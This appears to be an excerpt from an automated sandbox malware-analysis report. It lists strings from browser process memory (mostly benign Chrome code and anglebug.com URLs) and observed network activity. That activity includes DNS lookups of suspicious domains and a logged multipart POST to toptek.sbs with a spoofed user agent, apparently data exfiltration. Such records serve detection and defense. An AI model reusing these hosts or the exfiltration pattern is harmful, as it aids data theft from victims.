                Source: 000003.log6.24.drString found in binary or memory: "www.facebook.com": "{\"Tier1\": [1103, 6061], \"Tier2\": [5445, 1780, 8220]}", equals www.facebook.com (Facebook)
                Source: 000003.log6.24.drString found in binary or memory: "www.linkedin.com": "{\"Tier1\": [1103, 214, 6061], \"Tier2\": [2771, 9515, 1780, 1303, 1099, 6081, 5581, 9396]}", equals www.linkedin.com (Linkedin)
                Source: 000003.log6.24.drString found in binary or memory: "www.youtube.com": "{\"Tier1\": [983, 6061, 1103], \"Tier2\": [2413, 8118, 1720, 5007]}", equals www.youtube.com (Youtube)
                Source: chrome.exe, 0000000F.00000003.2546281340.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2546146966.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2545893165.0000327000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 0000000F.00000003.2546281340.0000327000F38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2546146966.0000327000F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2545893165.0000327000390000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: global trafficDNS traffic detected: DNS query: ZWVyoKcTcBhhzV.ZWVyoKcTcBhhzV
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: toptek.sbs
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: global trafficDNS traffic detected: DNS query: c.msn.com
                Source: global trafficDNS traffic detected: DNS query: api.msn.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----7QQIMOZMYUSRQI58G4WTUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: toptek.sbsContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2686116570.000074D00259C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2826527405.000028280267C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2686116570.000074D00259C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2826527405.000028280267C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2686116570.000074D00259C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2826527405.000028280267C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2793681816.0000282802578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
                Source: chrome.exe, 0000000F.00000003.2543469314.0000327000390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2543529861.0000327000D70000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.2684451753.000074D002578000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
